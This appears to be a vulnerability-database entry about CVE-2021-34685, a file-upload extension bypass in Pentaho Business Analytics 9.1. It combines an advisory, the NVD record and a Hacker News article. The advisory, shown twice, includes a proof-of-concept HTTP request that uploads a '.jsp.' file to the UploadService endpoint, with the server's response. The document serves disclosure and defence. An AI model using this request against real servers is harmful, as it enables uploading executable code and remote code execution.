DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-37008", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Pentaho Business Analytics / Pentaho Business Server 9.1 Filename Bypass Vulnerability", "description": "Pentaho allows users to upload various files of different file types. The upload service is implemented under the /pentaho/UploadService endpoint. The file types allowed by the application are csv, dat, txt, tar, zip, tgz, gz, gzip. When uploading a file with an extension other than the allowed file types, the application responds with the error message of UploadFileServlet.ERROR_0011 - File type not allowed. Allowable types are csv,dat,txt,tar,zip,tgz,gz,gzip. However, the file extension check can be bypassed by including a single dot \".\" at the end of the filename.", "published": "2021-11-07T00:00:00", "modified": "2021-11-07T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/37008", "reporter": "BlackHawk", "references": [], "cvelist": ["CVE-2021-34685"], "immutableFields": [], "lastseen": "2021-12-16T07:43:01", "viewCount": 122, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-34685"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164775"]}, {"type": "thn", "idList": ["THN:971D1D4FF2740FC9D6A574C660FBC692"]}], "rev": 4}, "score": {"value": 5.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-34685"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164775"]}, {"type": "thn", "idList": ["THN:971D1D4FF2740FC9D6A574C660FBC692"]}]}, "exploitation": null, "vulnersScore": 5.7}, "sourceHref": "https://0day.today/exploit/37008", "sourceData": "Product: Pentaho Business Analytics / Pentaho Business Server\nVendor / Manufacturer: Hitachi Vantara\nAffected Version(s): <= 9.1\nVulnerability Type: Bypass of Filename Extension Restrictions\nSolution Status: Fix Released on public GitHub repository\nManufacturer Notification: June 2021\nPublic Disclosure: 01 November 2021\nCVE Reference: CVE-2021-34685\nAuthor(s) of Advisory: Alberto Favero ( HawSec ) & Altion Malka\n\n--- ### --- ### ---\n\nProduct Description:\n\nPentaho is business intelligence (BI) software that provides data\nintegration, OLAP services, reporting, information dashboards, data mining\nand extract, transform, load (ETL) capabilities. Its headquarters are in\nOrlando, Florida. Pentaho was acquired by Hitachi Data Systems in 2015 and\nin 2017 became part of Hitachi Vantara.\n\n( Source: https://en.wikipedia.org/wiki/Pentaho )\n\n--- ### --- ### ---\n\nVulnerability Details:\n\nPentaho allows users to upload various files of different file types. The\nupload service is implemented under the \"/pentaho/UploadService\" endpoint.\nThe file types allowed by the application are \u201ccsv, dat, txt, tar, zip,\ntgz, gz, gzip\u201d. When uploading a file with an extension other than the\nallowed file types, the application responds with the error message of\n\"UploadFileServlet.ERROR_0011 - File type not allowed. Allowable types are\ncsv,dat,txt,tar,zip,tgz,gz,gzip\". However, the file extension check can be\nbypassed by including a single dot \".\" at the end of the filename.\n\n\n--- ### --- ### ---\n\nProof of Concept (PoC):\n\nSee Ginger ( https://github.com/HawSec/ginger )\n\nor\n\n--- ~~~ --- ~~~ ---\nPOST\n/pentaho/UploadService?file_name=test_file.jsp.&mark_temporary=false&unzip=false\nHTTP/1.1\nHost: localhost:8080\nContent-Length: 194\nCookie: session-flushed=true; JSESSIONID=A0D2E6A3857C5B7EEF763821513174E9;\nclient-time-offset=32; JSESSIONID=2D525AE6A712A91E6CA1CBE50177559C;\nsession-expiry=1617569433767; server-time=1617562233767\nConnection: close\n------WebKitFormBoundary1k7sJ9yjEbfj39Fl\nContent-Disposition: form-data; name=\"uploadFormElement\";\nfilename=\"test_file.txt\"\nContent-Type: text/plain\n[...]\nFILE_CONTENTS\n[...]\n------WebKitFormBoundary1k7sJ9yjEbfj39Fl--\n\n\nHTTP/1.1 200\nSet-Cookie: session-expiry=1617572215172; Path=/\nSet-Cookie: server-time=1617565015172; Path=/\nContent-Type: text/plain;charset=ISO-8859-1\nContent-Length: 6\nDate: Sun, 04 Apr 2021 19:36:55 GMT\nConnection: close\ntest_file.jsp.\n--- ~~~ --- ~~~ ---\n\n\n--- ### --- ### ---\n", "category": "web applications", "verified": true, "_state": {"dependencies": 1646200327}}

{"packetstorm": [{"lastseen": "2021-11-05T16:24:57", "description": "", "cvss3": {}, "published": "2021-11-05T00:00:00", "type": "packetstorm", "title": "Pentaho Business Analytics / Pentaho Business Server 9.1 Filename Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-34685"], "modified": "2021-11-05T00:00:00", "id": "PACKETSTORM:164775", "href": "https://packetstormsecurity.com/files/164775/Pentaho-Business-Analytics-Pentaho-Business-Server-9.1-Filename-Bypass.html", "sourceData": "`Product: Pentaho Business Analytics / Pentaho Business Server \nVendor / Manufacturer: Hitachi Vantara \nAffected Version(s): <= 9.1 \nVulnerability Type: Bypass of Filename Extension Restrictions \nSolution Status: Fix Released on public GitHub repository \nManufacturer Notification: June 2021 \nPublic Disclosure: 01 November 2021 \nCVE Reference: CVE-2021-34685 \nAuthor(s) of Advisory: Alberto Favero ( HawSec ) & Altion Malka \n \n--- ### --- ### --- \n \nProduct Description: \n \nPentaho is business intelligence (BI) software that provides data \nintegration, OLAP services, reporting, information dashboards, data mining \nand extract, transform, load (ETL) capabilities. Its headquarters are in \nOrlando, Florida. Pentaho was acquired by Hitachi Data Systems in 2015 and \nin 2017 became part of Hitachi Vantara. \n \n( Source: https://en.wikipedia.org/wiki/Pentaho ) \n \n--- ### --- ### --- \n \nVulnerability Details: \n \nPentaho allows users to upload various files of different file types. The \nupload service is implemented under the \"/pentaho/UploadService\" endpoint. \nThe file types allowed by the application are \u201ccsv, dat, txt, tar, zip, \ntgz, gz, gzip\u201d. When uploading a file with an extension other than the \nallowed file types, the application responds with the error message of \n\"UploadFileServlet.ERROR_0011 - File type not allowed. Allowable types are \ncsv,dat,txt,tar,zip,tgz,gz,gzip\". However, the file extension check can be \nbypassed by including a single dot \".\" at the end of the filename. \n \n \n--- ### --- ### --- \n \nProof of Concept (PoC): \n \nSee Ginger ( https://github.com/HawSec/ginger ) \n \nor \n \n--- ~~~ --- ~~~ --- \nPOST \n/pentaho/UploadService?file_name=test_file.jsp.&mark_temporary=false&unzip=false \nHTTP/1.1 \nHost: localhost:8080 \nContent-Length: 194 \nCookie: session-flushed=true; JSESSIONID=A0D2E6A3857C5B7EEF763821513174E9; \nclient-time-offset=32; JSESSIONID=2D525AE6A712A91E6CA1CBE50177559C; \nsession-expiry=1617569433767; server-time=1617562233767 \nConnection: close \n------WebKitFormBoundary1k7sJ9yjEbfj39Fl \nContent-Disposition: form-data; name=\"uploadFormElement\"; \nfilename=\"test_file.txt\" \nContent-Type: text/plain \n[...] \nFILE_CONTENTS \n[...] \n------WebKitFormBoundary1k7sJ9yjEbfj39Fl-- \n \n \nHTTP/1.1 200 \nSet-Cookie: session-expiry=1617572215172; Path=/ \nSet-Cookie: server-time=1617565015172; Path=/ \nContent-Type: text/plain;charset=ISO-8859-1 \nContent-Length: 6 \nDate: Sun, 04 Apr 2021 19:36:55 GMT \nConnection: close \ntest_file.jsp. \n--- ~~~ --- ~~~ --- \n \n \n--- ### --- ### --- \n \n \nCredits: \n \nThis vulnerability was discovered by Alberto Favero & Altion Malka \n \n--- ### --- ### --- \n \n \n \n \n-- \nBlackHawk - hawkgotyou@gmail.com \n \nExperientia senum, agilitas iuvenum. \nAdversa fortiter. Dubia prudenter. \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164775/pba91-bypass.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T18:44:50", "description": "UploadService in Hitachi Vantara Pentaho Business Analytics through 9.1 does not properly verify uploaded user files, which allows an authenticated user to upload various files of different file types. Specifically, a .jsp file is not allowed, but a .jsp. file is allowed (and leads to remote code execution).", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-08T04:15:00", "type": "cve", "title": "CVE-2021-34685", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34685"], "modified": "2021-11-09T21:52:00", "cpe": ["cpe:/a:hitachi:vantara_pentaho:9.1.0.0"], "id": "CVE-2021-34685", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34685", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:hitachi:vantara_pentaho:9.1.0.0:*:*:*:*:*:*:*"]}], "thn": [{"lastseen": "2022-05-09T12:38:08", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEizEp4OQW4wDSNAwvq0uto9BsVPAPqFrpSplKCFNc2FLYULJxOlzJJKRdvTsocAUdVK6Q7iMhb33WLc_9quIR5tIy8zXmcMA3QRMLJ-bzkUls4r_8vldCzMjt1r7qtqwnyJ7HU4MD7ic5vaRrthteD9KKY8XDReyeezNrRpChpSOXhEFwWYQMP9iuuy>)\n\nMultiple vulnerabilities have been disclosed in Hitachi Vantara's Pentaho Business Analytics software that could be abused by malicious actors to upload arbitrary data files and even execute arbitrary code on the underlying host system of the application.\n\nThe security weaknesses were [reported](<https://hawsec.com/publications/pentaho/>) by researchers Alberto Favero from German cybersecurity firm Hawsec and [Altion Malka](<https://twitter.com/altion_m>) from Census Labs earlier this year, prompting the company to [issue](<https://github.com/pentaho>) necessary patches to address the issues.\n\nPentaho is a Java-based business intelligence platform that offers data integration, analytics, online analytical processing (OLAP), and mining capabilities, and [counts](<https://censys.io/ipv4?q=Pentaho+Login>) major [companies and organizations](<https://www.hitachivantara.com/en-in/company/customer-stories/customer-search.html#cust=all>) like Bell, CERN, Cipal, Logitech, Nasdaq, Telefonica, Teradata, and the National September 11 Memorial and Museum among its customers.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjfjTs-qL76pYM54vlXnuFdLAB90GBtdKYkGTgBKY_DwFHQ7H4il5cak4SWSlwNG937cGba93b9PZlo2xHjjGAaQm2OrX9ifKaSKklHysLDUOQ098-Q0mSE7smMcHNkZHwYv1DFdrWLbHgTcS9bpCWqzkliZi9vkM9a24rAh33ZrFBFa-MBK4TBAzCc>)\n\nThe list of flaws, which affect Pentaho Business Analytics versions 9.1 and lower, is as follows -\n\n * **CVE-2021-31599** (CVSS score: 9.9) - Remote Code Execution through Pentaho Report Bundles\n * **CVE-2021-31600** (CVSS score: 4.3) - Jackrabbit User Enumeration\n * **CVE-2021-31601** (CVSS score: 7.1) - Insufficient Access Control of Data Source Management\n * **CVE-2021-31602** (CVSS score: 5.3) - Authentication Bypass of Spring APIs\n * **CVE-2021-34684** (CVSS score: 9.8) - Unauthenticated SQL Injection\n * **CVE-2021-34685** (CVSS score: 2.7) - Bypass of Filename Extension Restrictions\n\nSuccessful exploitation of the flaws could allow authenticated users with sufficient role permissions to upload and run Pentaho Report Bundles to run malicious code on the host server and exfiltrate sensitive application data, and circumvent filename extension restrictions enforced by the application and upload files of any type.\n\nWhat's more, they could also be leveraged by a low-privilege authenticated attacker to retrieve credentials and connection details of all Pentaho data sources, permitting the party to harvest and transmit data, in addition to enabling an unauthenticated user to execute arbitrary SQL queries on the backend database and retrieve data.\n\nIn light of the critical nature of the flaws and the risk they pose to the underlying system, users of the application are highly recommended to update to the latest version.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-01T12:08:00", "type": "thn", "title": "Critical Flaws Uncovered in Pentaho Business Analytics Software", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31599", "CVE-2021-31600", "CVE-2021-31601", "CVE-2021-31602", "CVE-2021-34684", "CVE-2021-34685"], "modified": "2021-11-01T19:21:43", "id": "THN:971D1D4FF2740FC9D6A574C660FBC692", "href": "https://thehackernews.com/2021/11/critical-flaws-uncovered-in-pentaho.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}